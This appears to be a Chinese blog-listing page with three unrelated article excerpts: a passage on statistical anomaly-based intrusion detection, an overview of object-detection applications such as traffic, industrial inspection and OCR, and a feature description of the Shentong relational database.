    • …等

    针对这些信息对象,创建一个统计描述,统计正常使用时的一些测量属性,如

    • 单位时间内外连访问次数
    • 操作失败次数(例如添加账号、系统账号登录)
    • 单位时间内新进程启动的种类数和次数

    测量属性的平均值将被用来与网络、系统的行为进行比较,任何观察值在正常偏差之外时,就认为有入侵发生。其优点是可检测到未知的入侵和更为复杂的入侵,缺点是误报、漏报率高,且不适应用户正常行为的突然改变。

    进入更具体一些的实际操作层面,基于统计的异常检测方法主要包括以下关键技术:

    • 选取合适的统计量:在入侵检测系统中,采用统计量描述系统和用户的行为,统计量也包括系统、主机、用户的信息,而且每种统计量的表达方式也不尽相同。选择能够明确表达入侵的统计量是十分重要的。
    • 基于统计的入侵检测系统应该具有自学习和自适应能力:得到了系统信息元素的统计量之后,接下来的步骤就是确定当前系统运行轮廓,根据统计窗口的不同,可以分为两种思路
      • 单统计量窗口:不做任何统计量的聚合,将每一个统计量向量当成一个信息元素,在后续的异常判断阶段通过一个确定的阈值来判别异常
      • 多统计量窗口(即生成统计量之上的统计量):设定一个滑动的窗口,对统计量再进行一次聚合,例如
        • 正态分布建模
        • 按照STL时序信号分解为周期和趋势信号
        • 或者只是简单的计算均值
    • 统计数据的分析和入侵的判断:在选取合适的统计量之后,就要每隔一段时间对系统数据进行采样,同时分析该统计量的概率分布特性。将多个统计量联合分析,最终得出当前系统的评价值,当该评价值超过预设的阈值,就表明存在入侵行为。阈值的设定是非常重要的。
      • 阈值可以是根据历史信息、窗口统计信息动态自动生成的
      • 专家经验设定的阈值

    关于统计异常建模的应用方面讨论,还可以参阅这篇文章。

    笔者这里以入侵检测为例,粗粒度地讨论一下如何通过统计异常来进行异常入侵检测

    1)统计量选择

    统计量的选择要遵循【最大信息增益】与【统计相关性】原理,根据对目标预测效能的统计相关性进行排序,优先选择排在靠前的特征。

    对于非结构化的信息对象,可以根据信息对象本身的属性以及专家领域经验,总结出一系列统计量,也即特征,

    • 单位时间窗口内进程启动次数
    • 单位时间窗口内进程启动类型数(进程名去重)
    • 单位时间窗口内进程启动的最大时间间隔(max-min)
    • 单位时间窗口内进程启动对应的会话sid数量(会话数)
    • 单位时间窗口内进程启动对应的父进程ppid数量(父进程数)
    • 单位时间窗口内进程启动对应的当前目录数量(cwd数)
    • 单位时间窗口内CPU的均值和方差
    • 单位时间窗口内进程发起的网络外连数量(连接数)
    • 单位时间窗口内进程发起的网络外连IP数量(目的IP数)
    • 单位时间窗口内进程发起的网络外连Port数量(目的端口数)
    • 单位时间窗口内进程写文件数量(File Write次数)
    • 单位时间窗口内进程写文件文件名数量(FIlename去重数量)
    • 单位时间窗口内进程写文件行为的最大时间间隔(max-min)

    2)统计量分析和入侵判断

    在这里插入图片描述在这里插入图片描述

    笔者抽取了以进程为轴心的相关行为日志,进程、网络、进程写文件、cpu,根据10分钟为一个归并窗口得到相关的统计量。

    并根据已知的历史告警库对样本向量表进行了打标,然后通过GBDT进行了有监督训练,基于训练得到的模型对新数据进行了预测,

    GBDT预测结果AUC曲线

    特征重要性排序

    通过一些列实验,笔者得出下列初步结论:

    • 从统计意义上看,概率型的统计量指标和入侵之间有一定的相关性,但并不是十分明显,从相关性和信息论的角度来说,进程行为相关的统计量,对表征系统是否遭到入侵的结果,并不能提供非常多的有效互信息。因此基于概率论基础的方法,很难直接进行精确地入侵检测
    • 由概率统计衍生出的其他方法,例如马尔科夫方法,因为和统计量本身具有底层的相关性传递关系,因此从信息论的角度来看,也可以得到初步推论,仅仅依靠马尔科夫方法是无法直接进行入侵检测判断的
    • 基于概率论的统计型异常检测,非常依赖样本库中的概率分布,笔者所用的样本集以批量蠕虫、脚本自动化入侵、挖矿木马频繁启动为主要异常类型。因此像“启动进程名数量、“cpu波动”这类的指标,就会在模型中占据比较靠前的位置。但是对“unknown unknown”的情况,统计模型能否提供泛化能力,依然是个未知数

    笔者思考

    对于网络安全这个特殊的领域来说,目前来说置信度最高的检测方法论还是【检测黑客达成了哪些攻击目的】,具体来说就是:

    • 通过关联http-request和http-response的成对逻辑关系以及特定文本特征,判定http攻击成功的事实推断
    • 检测到某个落盘文件,同时通过av判定该文件是一个病毒木马,则反过来推定该落盘行为是一次攻击成功事件
    • 检测到某个进程启动,通过分析其命令行中包含的url或者文件,如果判定其是一个病毒木马,则反过来推断该进程启动是一次恶意行为

    以上的种种方法,从本质上看,都是【检测黑客达成了哪些攻击目的】,是在检测被攻击的客体所遭到的攻击的结果。现在业内也已经有很多这方面的良好实践和应用。

    但是反过来,是否可以转换思路,从攻击者主体的角度主动发现攻击者,通过图论算法将攻击者所在的社区或者单个攻击者离群点给“圈定”出来。如果能有效发现攻击者,就拥有了主动情报,基于主动情报,发现客体的被入侵行为就非常简单了。

    3)统计轮廓自适应能力

    2. 基于有监督学习的异常检测方法

    有监督学习方法采用非参量化的分析技术,使用自学习技术来提取异常行为的特征,需要对训练数据集进行学习以得出正常的行为模式,并且要求保证训练数据的纯洁性,即不包含任何入侵或异常的用户行为。

    神经网络是一种典型的有监督学习,它由大量的处理单元(unit)组成,单元之间通过带有权值的连接(connection)进行交互。神经网络所包含的知识体现在网络的结构当中,学习过程就表现为权值的改变和连接的添加或删除。

    3. 基于数据挖掘的入侵检测方法

    数据挖掘是指从数据库或数据仓库的数据中提取人们感兴趣的知识或规则,这些知识和规则是隐含的、事先未知的、对决策有潜在价值的。提取的知识通常用如下几种形式表示:

    • 概念
    • 规则
    • 模式

    在入侵检测系统中,数据挖掘通常是指从大量的数据中提取出模型的过程,采取以数据未中心的观点,把入侵检测看成一个数据分析的过程。

    • 在异常检测过程中,数据挖掘主要从审计数据中发现正常的使用模式
    • 在误用检测过程中,数据数据主要实现审计数据编码并与攻击模式匹配的过程

    关于关联规则挖掘在网络安全里的应用讨论,可以参阅另一篇文章。

    4. 异常检测的基本前提假设

    异常检测的基本前提假设是用户的正常行为表现为可预测的、一致的、有规律的系统使用模式,它通过描述正常行为的模式来检查和标记非正常(异常)行为。

    但是,并非所有的异常行为都是入侵行为,入侵行为只是异常行为的一个子集,而这也是异常检测容易引起误报的原因。

    异常检测的基础是异常行为模式系统的误用。

    安全数据分析师将轮廓定义成度量集(特征集合),度量衡量用户特定方面的行为,每一个度量与一个阈值(固定或者动态)相联系,异常阈值设置的不恰当会造成IDS出现较高的误报率和漏检率。

    关于异常检测中的阈值设定,常见的有如下方法论:

    • 量化分析:其检测规则和属性以数值形式表示。该技术经常假定一些计算,包括从简单的加法到比较复杂的密码学计算,这些技术的结果成为误用检测和异常检测统计方法的基础。常见的方法如:
      • 阈值检测:用户和系统行为根据某种属性计数进行描述
      • 启发式阈值检测:在阈值检测基础上进一步使它适合于观察层次
      • 基于目标的集成检查:对在一个系统客体中一次变化的检查,该系统客体通常不应发生不可预测的变化
      • 量化分析和数据精简:从海量事件信息中删除过剩或冗余信息的处理
    • Denning的原始模型:该模型在1986年由Dorty Denning提出,他主张在一个系统中可包括4个统计模型,即:
      • 可操作模型:将度量值与阈值相比较,当度量值超出阈值时触发一个异常
      • 平均和标准差模型:假定行为信任区域的一个度量值为一些参数的平均值的标准差,一个新行为落在信任区域内则为正常,落在外部则为异常
      • 多变量模型:基于两个或多个度量值来执行
      • Markov处理模型:将事件的每个不同类型作为一个状态变量,使用一个状态转换矩阵来描述不同状态之间的转换频率,频率过低则为异常
    • 统计方法:系统生成原始的行为特征文件,异常检测系统定期从历史的特征文件中产生新的特征文件(即统计量的历史窗口统计量)
    • 基于规则的方法:该方法的潜在假定与统计方法的假定类似,不同之处在于基于规则的方法使用规则集来表示和存储使用模型。在事件顺序中查找模式,若某个事件匹配了规则头,但下一个事件不在规则集中,则判断为异常
    • 非参统计度量:早期的统计方法都使用参数方法来描述用户和其他系统实体的行为模式,用户行为模式的分布一般都假定为高斯分布或正态分布,当假定不正确时,异常检测的错误率很高。为此,有学者提出用非参技术来执行异常检测,该方法提供很少的可预测使用模式来容纳用户的能力,并允许分析器考虑不容易由参数方案容纳的系统度量,这其中涉及非参数据区分技术,尤其是群集技术。该方法的前提是根据用户特征吧表示的用户活动数据分成两个明显区别的群,一个指示异常活动,一个指示正常活动。
    • 神经网络:也属于非参分析技术的一种

    0x3:协议分析(NTA)

    协议分析是出现最晚的入侵检测方法,它利用网络协议的高度规则性,快速识别协议,并检测是否存在攻击,通过辨别数据包的协议类型,以便使用相应的数据分析程序来检测数据包。

    协议分析技术的主要优势在于采用命令解析器(在不同的协议层次上),能够对每个用户命令作出详细分析,如果出现IP碎片,可以对数据包进行重组还原,然后再进行分析。

    展开全文
  • 作者主页(文火冰糖的硅基工坊):文火冰糖(王文兵)的博客_文火冰糖的硅基工坊_CSDN博客 ... 目录 前言: 场景一:统计目标的个数 1.1 电子元器件数统计 ...1.2 电子显微镜下不同细胞数量的统计 ...场景六:文本检测Text

    作者主页(文火冰糖的硅基工坊):文火冰糖(王文兵)的博客_文火冰糖的硅基工坊_CSDN博客

    本文网址:https://blog.csdn.net/HiWangWenBing/article/details/122307915


    目录

    前言:

    场景一:统计目标的个数

    1.1 电子元器件数统计

    1.2 电子显微镜下不同细胞数量的统计

    1.3 人群中人数的统计

    场景二:阿里云视觉智能开放平台上线的目标检测能力

    场景三:智慧交通

    场景四:工业检测

    场景五:仓库物品检测

    场景六:文本检测Text Detection(OCR)


    前言:

    目标检测,如YOLO算,有哪些实际应用呢? 在回答这个问题之前,我们首先看一下目标检测的基本任务:

    • 图片中目标的检测(置信度)
    • 图片中目标的定位(位置)
    • 图片中目标的分类(分类)

    基于上述三大基本任务,衍生出各种场景的应用。

    场景一:统计目标的个数

    1.1 电子元器件数统计

    背景:电子厂的电子元器件生产流水线,特别是插件散装的器件,可以用电子称称量计算出个数,但误差还是不能接受,尝试图像识别方案,目测能解决这个问题!

    1.2 电子显微镜下不同细胞数量的统计

    显微镜下细胞的统计是一个很繁琐的事,通常采用局部采用,然后进行全局推广的方式统计细胞的总数,如果采用高分辨率图片 + 小目标检测,可以精确判断各种细胞的数量。

    1.3 人群中人数的统计

    主要用于判断交通信号,对行人的反应,夜间交通,检测开会人数等应用。

    场景二:阿里云视觉智能开放平台上线的目标检测能力

    阿里云视觉智能开放平台上线的目标检测能力,通过这些能力,可以看到目标检测的一些常用应用。

    类别能力说明
    通用检测主体检测检测图像中的内容主体,返回该主体的区域位置/坐标信息。
    白底图检测检测图片背景是否为白底。
    透明图检测检测图片背景是否透明。
    物体检测检测输入图像中的物体。
    IPC图像目标检测可以检测到输入图像中的目标物体,例如人、车辆、宠物等。
    IPC视频目标检测可以检测到输入视频中的目标物体,例如人、车辆、宠物等。
    车辆检测车辆损伤识别针对常见小汽车车型,识别车辆外观受损部件及损伤类型,可识别数十种车辆部件,五大类外观损伤(刮擦、凹陷、开裂、褶皱、穿洞)。
    车辆部件识别检测图片中车辆部件的位置以及名称。
    车辆仪表盘识别识别车辆仪表盘上故障灯等信息。
    机动车检测检测图像中的机动车主体,返回该机动车主体的区域位置/坐标信息。
    车险图片分类对输入的车险图片进行分类。
    车辆拥堵检测根据图片中的车辆,判断是否发生拥堵。
    车辆违停检测可通过检测图片中目标区域内是否有车辆停放。
    车辆维修生成车辆维修方案识别车辆受损照片,并根据受损情况生成车辆维修方案。
    查询车辆维修方案及费用根据生成的维修方案,查询车辆具体的维修方案及维修费用。

    场景三:智慧交通

    智慧交通是目标检测的一个重要应用领域,主要包括如下场景。

    (1)交通流量监控与红绿灯配时控制:通过视觉算法,对道路卡口相机和电警相机中采集的视频图像进行分析,根据相应路段的车流量,调整红绿灯配时策略,提升交通通行能力。

    (2)异常事件检测:通过视觉算法,检测各种交通异常事件,包括非机动车驶入机动车道、车辆占用应急车道以及监控危险品运输车辆驾驶员的驾驶行为、交通事故实时报警等,第一时间将异常事件上报给交管部门。

    (3)交通违法事件检测和追踪:通过视觉算法,发现套牌车辆、收费站逃费现象,跟踪肇事车辆,对可疑车辆/行人进行全程轨迹追踪,通过视觉技术手段,极大地提升公安/交管部门的监管能力。

    (4)自动驾驶:自动驾驶是当今热门的研究领域,是一个多种前沿技术高度交叉的研究方向,其中视觉相关算法主要包含对道路、车辆以及行人的检测,对交通标志物以及路旁物体的检测识别等。主流的人工智能公司都投入了大量的资源进行自动驾驶方面的研发,目前已经初步实现了受限路况条件下的自动驾驶,但距离实现不受路况、天气等因素影响的自动驾驶(L4级别),尚有相当大的一段距离。

    (5)行人检测:作为一种重要的目标检测应用,在自动驾驶、视频监控、刑事侦查等领域得到了广泛的关注。早期的行人检测方法,如HOG检测器,ICF检测器,在特征表示,分类器的设计,检测加速度方面,为一般的目标检测奠定了坚实的基础。近年来,一些通用的目标检测算法,如Faster RCNN,已经被引用到行人检测中,极大地推动了该领域的研究进展。行人检测的挑战和困难可以总结如下。

    Small pedestrian:上图(a)显示了一些远离摄像机拍摄的小行人的例子。在 Caltech 数据集中,15%的行人高度小于30像素。

    Hard negatives:街景图像中的一些背景与行人的视觉外观非常相似,如上图(b)所示。

    Dense and occluded pedestrian:上图(c)显示了密集和遮挡行人的一些例子。在 Caltech 数据集中,未被遮挡的行人仅占行人总数的29%。

    Real-time detection:从高清视频中实时检测行人对自动驾驶和视频监控等应用至关重要。

    从根本上看,交通场景中各种具体应用的底层实现,都是以目标检测技术为基础的,即对道路、车辆以及行人进行检测。

    场景四:工业检测

    工业检测是计算机视觉的另一个重要应用领域,在各个行业均有极为广泛的应用。

    在产品的生产过程中,由于原料、制造业工艺、环境等因素的影响,产品有可能产生各种各样的问题。其中相当一部分是所谓的外观缺陷,即人眼可识别的缺陷。

    下图是电路板内层芯板断路示意图,明显可以看出图中铜导线有一个断开的部分。

    在传统生产流程中,外观缺陷大多采用人工检测的方式进行识别,不仅消耗人力成本,也无法保障检测效果。

    工业检测,就是利用计算机视觉技术中的目标检测算法,把产品在生产过程中出现的裂纹、形变、部件丢失等外观缺陷检测出来,达到提升产品质量稳定性、提高生产效率的目的。

    场景五:仓库物品检测

    场景六:文本检测Text Detection(OCR)

    几千年来,文字一直是人类的主要信息载体。

    文本检测的基本目标是确定给定图像中是否有文本,如果有,则定位并识别它

    文本检测有着非常广泛的应用。它帮助视障人士 “ 阅读 ” 街道标志和货币。在地理信息系统中,对门牌号和街道标识的检测和识别使得构建数字地图更加容易。

    文本检测的难点和挑战可以总结如下。

    Different fonts and languages:文本可能有不同的字体、颜色和语言,如下图(a)所示。

    Text rotation and perspective distortion:文本可能有不同的方向,甚至可能有透视失真,如下图(b)所示。

    Densely arranged text localization:长径比大、布局密集的文本行很难精确定位,如下图(c)所示。

    Broken and blurred characters:破碎和模糊的字符在街景图像中很常见。


    作者主页(文火冰糖的硅基工坊):文火冰糖(王文兵)的博客_文火冰糖的硅基工坊_CSDN博客

    本文网址:https://blog.csdn.net/HiWangWenBing/article/details/122307915

    展开全文
  • 神通大型通用数据库

    千次阅读 2020-12-30 15:01:53
    单表数据存储量32T以上。数据表单表最大列数大于1500列。单表数据存储量100T以上,单表支持行数千亿行级。· 索引提供创建、修改索引信息功能。支持多种索引,包括B+树索引(唯一、非唯一)、基于B树的函数索引、...

    (一)标准SQL

    · 表

    提供创建表、修改表名称、字段名称与类型、添加/删除字段等表结构定义操作。单表数据存储量为32T以上。数据表单表最大列数大于1500列。单表数据存储量为100T以上,单表支持行数千亿行级。

    · 索引

    提供创建、修改索引信息功能。支持多种索引,包括B+树索引(唯一、非唯一)、基于B树的函数索引、全局分区索引、局部分区索引、位图索引、Hash索引。

    ·多种数据类型

    提供丰富的数据类型支持,包括:字符串类型、精确数值类型、布尔型、近似数值类型、日期类型、时间间隔类型、二进制大对象、字符型大对象、自定义数据类型等。

    ·丰富的内置函数

    提供丰富的内置函数,并可以根据用户的实际需要定制特殊的函数。主要包括:数值函数、分析函数、字符函数、类型转换函数、统计分析函数、日期时间函数、聚合函数、散列函数、大对象函数、系统管理函数、XML处理函数等,可以根据用户的实际需要定制特殊的函数。

    ·自定义存储过程/函数

    支持创建、编辑、删除、编译存储过程,检查存储过程的依赖对象。存储过程是SQL语句和控制流语句的预编译集合,以一个名称存储并作为一个单元处理。使用存储过程可以在单个存储过程中执行一系列 SQL 语句;可以在存储过程内引用其它存储过程,这可以将应用逻辑模块化,使得代码清晰,易于调试;存储过程在创建时即在服务器上进行编译,所以执行起来比单个 SQL 语句快;存储过程的语句执行和结果传递发生在服务端,减少了网络开销。

    ·视图

    提供创建、删除视图功能。支持视图和物化视图。供自动和手动两种机制来保证物化视图和基表数据库的一致性,并提供快速刷新或者完全刷新两种物化视图更新方式。当基表更新时,可指定刷新方式或者由数据库自动选择最优的刷新方式。视图限制表的行列子集的存取,为表提供额外的安全性;也可以简化用户操作或用于保存复杂查询等场合。

    ·用户

    提供创建用户,对用户的授权(角色和权限)、删除用户、修改用户配置信息等管理功能。

    ·模式

    一个数据库可以包含一个或多个命名的模式,一个模式内可以包含多个表。使用模式能保证用户使用同一数据库而不会互相影响,实现对数据库中的对象进行逻辑分组。

    ·触发器

    支持创建、编辑、删除和编译触发器,检查触发器的依赖对象。触发器是一种特殊类型的存储过程,当在特定对象上发生特定事件时,数据库会自动执行触发器的响应代码。触发器可通过数据库中的相关表实现级联更改,保证数据一致性;定义比CHECK约束更为复杂的约束;根据数据修改前后的表状态执行复杂的应用逻辑。神通数据库触发器支持如下特性:

    √ 触发对象:表、模式、数据库

    √ 触发方式:执行前、执行后、行前、行后

    √触发事件:INSERT、DELETE、UPDATE、CREATE、DROP、REVOKE、GRANT、ALTER、ARCHIVE

    √ 条件过滤:支持在创建触发器时指定一个表达式作为过滤条件,只有满足该条件的元组才执行触发器操作的条件触发

    ·约束

    提供约束定义与修改功能(主键/外键/NOT NULL/CHECK/UNIQUE/DEFUULT等约束条件的设置)。完整性约束通过约束规则来保证数据库的完整性。约束规则定义关于列中允许值的规则,是强制完整性的标准机制。

    ·分区表

    提供创建分区表、修改分区表、删除分区表功能,支持一级及二级水平分区,包括:哈希、范围、列表、时间间隔分区类型,支持范围分区等常用类型。支持基于分区的并行查询能力;包括不同分区的存储参数设置等。分区方式不受CPU数量、节点数量等影响,并提供智能分区管理功能以实现自动均衡数据分布。支持分区在线动态管理,包括分区表导入导出,分区创建,分区合并、分区拆分、分区删除,分区truncate。部分分区离线不影响其他分区使用。

    ·外部表

    提供定义外部结构化数据文件(如Execl文件、txt文件),并通过图形化界面查询数据库外部数据文件数据的功能。

    ·数据字典

    提供的数据字典视图进行查询或通过图形化管理工具查看下列数据库实例相关信息:实例名称、安装的主机名称、版本、启动时间、当前状态、运行模式(并行、归档、DBA维护、管理的数据库等)、运行统计信息(会话等)等。

    提供数据字典视图或图形化管理工具来查看数据缓存、日志缓存、数据字典缓存等各种内存组建信息,包括缓存的名称、设置大小、实际使用情况等动态信息。对于各种缓存区,提供实时的命中率等优化缓存配置的信息。能够依据DBMS当前数据量和工作负载大小自动或建议用户设置合理的缓存配置策略。

    ·大对象数据

    支持单表对大文本/二进制大对象(包括声音、视频等)的存储定义和数据存储管理能力,提供增、删、改、查、追加操作,并提供大对象的预览功能。单个大对象的最大容量支持到4GB。

    ·事务隔离级别

    事务是用户定义的一个数据库操作序列,这些操作要么全做要么全不做,是一个不可分割的工作单位。它具有四个属性:原子性、一致性、隔离性和持久性。隔离级别用来表示一个事务在与其它事务并发执行时所能容忍干扰的程度。隔离级别越高,干扰越少,并发程度越低;隔离级别越低,干扰越多,并发程度越高。

    神通数据库提供四种隔离级别:

    * READ UNCOMMITTED:读不提交

    * READ COMMITTED:读提交

    * REPEATABLE READ:可重复读

    * SERIALIZABLE:可串行化

    (二)应用开发支持

    ·硬件兼容

    兼容多种硬件体系,保证各种平台上具有一致的数据存储结构和通信协议,使各种组件或工具均可以跨不同的软、硬件平台与数据库服务器进行交互。

    ·SQL语句

    神通数据库完全支持SQL92规范入门级标准,部分支持过渡级标准;支持SQL99、SQL2003标准核心功能

    ·存储过程

    兼容ORACLE的存储过程、包等机制

    ·完善的驱动接口

    支持多种数据库开发接口,包括但不限于:ODBC2.X/3.X、JDBC3.0、OLE DB2.7、UNIX ODBC、ADO.NET、C API、ESQL(PRO*C)、QT、ACI(OCI)、STCL(C++)、PL/SQL、XML特性及XA等开发接口和.Net Provider等数据库访问接口,并提供高性能的直接数据访问接口。满足C、C++、JAVA、PHP、R、Python、Perl等语言开发需求。

    ·多种常见开发框架

    支持Struct、spring、hibernate、iBATIS等多种常见开发框架

    ·支持多种开发语言

    支持PB、Delphi、VB、VC、VS .NET、JAVA、XML、ADA、jBuilder、Eclipse、visual studio、powerdesigner等具有广泛适应性的开发语言和工具

    ·支持多种中间件

    东方通、金蝶、中创、IIS、WebLogic、JBoss、Tomcat等主流的应用服务器

    ·支持多种操作系统

    神通数据库的图形工具完全基于JAVA语言开发,具有良好的跨平台性。即同一程序无需重新编译,将执行代码拷贝到任一种操作系统平台上,都能直接运行,保证了图形界面在各种操作系统上的一致性。

    神通数据库利用底层的操作系统抽象层屏蔽了多种操作系统之间差异,支持Windows、Linux、Solaris、HP-Unix、AIX等多种主流的操作系统平台。支持自主品牌操作系统,包括中标麒麟、天津麒麟、中科方德、凝思磐石等

    ·支持多种服务器

    支持国内外主流服务器产品。包括IBM、惠普、戴尔、华为、浪潮、联想、曙光等服务器。支持基于自主品牌芯片的服务器,基于龙芯、飞腾、申威等芯片的服务器。

    ·支持多种字符集

    神通数据库内核完全支持Unicode字符集的存储和处理,实现了对国际化字符集的完美支持,如:简体中文(GBK、GB2312和GB18030)、繁体中文(BIG5)、拉丁语系、阿拉伯语系等。支持ASCII、Unicode,GBK、GB2312、GB18030等常用字符集,支持UTF-8、UTF-16等国际编码。支持国家标准的中文字符的存储、处理。

    (三)管理工具

    神通数据库提供命令行客户端及基于跨平台技术的风格统一的全图形化客户端管理维护工具。同时支持基于Web的管理工具,可进行本地和远程联机管理。

    · 安装向导

    支持GUI图像向导安装。支持静默安装,能和应用程序打包一体安装;Windows和Linux体系安装过程应该完全一致。

    ·DBA管理工具

    DBA管理控制平台是为数据库管理员提供的跨平台图形化管理工具。通过集中式多服务器管理的方式,能对各数据库服务器上的数据库对象(如表、视图、约束、索引、触发器、序列、存储过程、用户、角色和权限等)提供相应的可视化管理,同时支持针对数据库服务器的存储和数据库复制的管理。

    DBA管理工具

    ·交互式SQL查询工具

    交互式SQL查询工具的功能主要包括:

    √ 创建和执行SQL脚本

    √查看和使用数据库中的相关对象

    交互式SQL查询工具即SQL查询分析器,是一种专用于交互式执行SQL语句和脚本的工具,它为用户提供了一个图形化界面来使用SQL语言,操作数据库对象和更新数据。

    SQL查询分析器

    ·数据迁移工具

    数据迁移工具是前台管理工具集合中的一个实用工具,其主要功能是进行神通数据库与其它各种异构数据源,如各种关系数据库系统、Excel文件、文本文件、数据文件(CSV、XML、SQL)之间数据的迁移、转换以及合并。它为用户提供图形化的界面,采用向导提示的方式帮助用户进行数据的转换。

    数据迁移工具支持跨平台迁移:

    Ø支持WINDOWS、Linux和Unix平台和多种数据源

    Ø 支持断点续迁和可配置的遇错处理策略

    Ø 支持可配置的迁移项目和迁移计划

    Ø 支持多线程迁移

    Ø 大幅提高数据准备阶段数据迁移操作性能

    Ø 命令行迁移

    Ø 丰富的迁移监控和诊断机制,支持迁移报告和迁移日志

    跨平台迁移工具

    数据迁移工具支持的数据源包括:

    Ø 神通数据库

    Ø Oracle

    Ø Microsoft SQL Server

    Ø IBM DB2

    Ø Mysql

    Ø Sybase

    Ø Informix

    Ø Microsoft Excel

    Ø 文本文件

    Ø 其他支持ODBC的数据源

    ·数据库配置工具

    数据库配置工具提供的功能包括:

    √数据库创建

    √数据库删除

    √设定启动数据库

    数据库配置工具

    ·逻辑备份和恢复工具

    利用逻辑备份和恢复工具,用户可以对指定数据库中的单个或一组对象执行备份和恢复操作。也可以针对库级、用户级、表级进行备份和恢复,逻辑备份后的数据将存放在客户端用户指定的文件中。用户可以通过恢复工具执行恢复操作,此时需要选择相应的备份记录。

    逻辑恢复与备份工具

    ·C版迁移工具

    √ 数据源支持其他国产数据库

    √按照分区迁移功能

    √断点续迁功能

    可以从其他国产数据库迁移表、视图、索引、约束到神通数据库;支持神通数据库到神通数据库的分区表迁移;支持表和索引的中断续迁。

    C版迁移工具

    ·导入导出工具

    导入导出工具提供的功能包括:

    √忽略错行继续导入功能

    √对指定列进行导入

    √sql语句查询导出

    忽略错行继续导入功能,导入工具如发现缓冲区内数据有错误,将出错位置前后的数据继续导入。支持文件特定列到神通特定列的导入功能,实现了将默认值导入到神通特定列的功能。支持sql语句查询导出,不再只是单表导出功能。

    ·数据库维护工具

    数据库维护工具包括以下功能:

    √物理备份和恢复:即对数据库物理文件的备份,支持完全备份和增量备份。

    √作业调度:支持调度任务和调度计划。

    利用物理备份工具可以对整个神通数据库执行物理备份操作,备份数据将存放在服务器端用户指定的文件夹中,而且可以进行完全备份和增量备份。用户可以通过配套的恢复工具执行恢复操作,此时需要选择相应的备份记录。

    物理备份和恢复工具

    用户可以使用调度工具创建调度作业,以执行经常重复和可调度的任务。如SQL脚本等。

    数据库维护工具

    ·审计工具

    审计管理员可以通过审计中心定制审计策略,记录安全审计所需的数据库操作信息,并对信息进行分析。审计管理员能够执行的审计功能包括设置审计入口点、定制审计安全事件、配置入侵检测的误用规则、查看系统踪迹。

    审计工具提供以下几种审计功能:

    √权限审计

    √语句审计

    √用户审计

    √对象审计

    √缺省审计

    审计工具

    ·系统参数配置工具

    系统参数配置工具能够方便地让用户直接配置数据库产品的关键参数,从而更好的适应不同的软硬件平台环境,该工具提供了三个功能:

    √当前配置:显示数据库系统运行时的参数并可对其进行设置

    √智能配置:根据当前服务器状况,智能的指导用户进行参数配置

    √高级配置:将参数按功能分组,为用户提供灵活的参数配置方式

    系统参数配置工具

    ·性能监测工具

    性能监测工具提供对数据库运行状况和性能的监测、跟踪、统计以及控制,使用这一工具能够为数据库管理员提供方便的对系统进行监控的手段,主要包括:

    √数据库运行监控:提供会话、SQL执行、系统缓存、系统I/O、事务与锁、系统内存等方面的数据库运行状态和性能信息。

    √性能数据跟踪与统计:对重要的表征数据库性能的数据进行采样跟踪,并对其最值和均值进行统计,同时这些数据的监测可以实时配置和控制。

    √SQL跟踪统计:SQL跟踪统计提供对SQL语句的跟踪与统计的功能,用户可以选择要跟踪和统计的SQL语句的规则和数量。

    √图形化显示执行计划:为每个查询产生一个查询计划。为匹配查询结构和数据属性,选择正确的计划对性能有关键性的影响。使用图形化的执行计划可以直观的查看系统为特定查询生成的查询计划。

    ·异构数据库统一访问平台

    目前神通数据库实现异构数据库统一访问平台工具,在访问神通数据库的同时,也支持访问oracle、SQLserver、mysql等异构数据库,为用户在跨库间数据访问操作时,提供统一的访问工具,简化用户操作;统一后的工具,在用户权限管理也进行了统一管理,权限管理就更简单。

    二、产品特性

    (一)高性能

    神通数据库管理系统通过采用多种高效存储和数据处理技术使系统具有高性能性。包括:索引支持、全文检索、高效的扩展性、多种优化查询策略、高效的自动数据压缩、高效的IO性能、高效的排序性能、高效的PL执行性能、查询计划缓存、物化视图、索引优化向导、并行查询、分区技术、结果集缓存、基于代价估算的查询优化策略、直接路径数据加载等。

    依托以上性能提升手段,神通数据库管理系统具备强大的事务处理能力,提供联机交易处理(OLTP)能力,同时也具备数据仓库分析(OLAP)特性。单机支持上千用户并发量,多机集群支持PB级数据量。支持多CPU并行的SMP扩展性。

    (二)高可用

    神通数据库管理系统可通过基于共享存储的双机热备架构、双机日志同步架构、多机读写分离(同步异步混合模式)高可用架构实现系统各节点的监控及故障切换。

    基于共享存储的双机热备:支持数据库自有的双机热备高可用功能,实现基于共享磁盘的HA双机热备功能,且不依赖第三方的HA软件产品。支持对主机CPU、网络、内容、磁盘、服务进程等多种资源的心跳监控,保证数据库系统的高可用性。

    双机日志同步:当主节点的数据和日志进行了更新操作,会实时将写入日志同步至备节点,从而使备节点的数据与主节点拉平,实时保持主备节点数据的一致。当主节点出现故障时,可秒级切换至备节点继续提供数据服务。由于主备节点数据完全一致,可消除存储层的单点故障。

    多机读写分离(同步异步混合模式)高可用架构:神通数据库管理系统支持多机读写分离集群部署架构,实现一主多从的主从同步和主从异步的部署方案,主机接收读写访问,从机通过负载均衡方式处理客户的读请求,由于大部分读请求分散到了备节点上,可最大程度上缓解对主节点的读压力。同时支持动态增删数据库节点。读写分离所有节点均可部署于自主可控服务器上。通过多机读写分离部署架构,既能保证系统的高可用性,同时也能提升系统的整体性能。

    通过以上高可用解决方案,可使用户系统的平均无故障时间MTTF >3年,平均故障修复时间MTTR <10分钟。

    (三)高安全

    神通数据库管理系统的安全技术优势主要体现在数据安全访问、数据安全存储、数据安全传输、数据安全权限管理等安全机制。完全符合国家安全等级保护要求及国家信息安全技术标准。采用多种技术手段来确保数据访问行为的合法性,防止非法用户读写数据。包括:强用户身份鉴别、自主访问控制机制、强制访问控制机制保证数据的安全访问。

    提供了多种加密方式来保证数据存储安全。保存在数据库中的信息经过加密,即使数据介质被非法窃取,窃密者也无法获得有效的信息。通过外部密钥加密套件、透明加密策略保证数据的安全存储。

    √采用可信任路径技术来确保业务数据的安全传输,保证数据传输端到端的安全性。

    √采用独立审计中心和三权分立的安全管理体系来确保数据库权限管理的安全性。

    对于神通数据库管理系统安全版,除上述企业级安全功能之外,还对以下安全机制进行了增强和安全功能模块的增加。包括:可信任路径、强身份鉴别加固、基于三元分立的权限管理模型、多粒度自主访问控制、基于标签的强制访问控制、数据存储加密、独立审计中心、客体重用、资源控制、入侵防范和预警等。

    (四)高可靠

    神通数据库管理系统产品可靠性要求达到99.99%,MTTR(平均故障修复时间)小于2.5分钟,MTBF(平均故障间隔时间)大于4500小时。可通过如下方式保证系统的高可靠性:

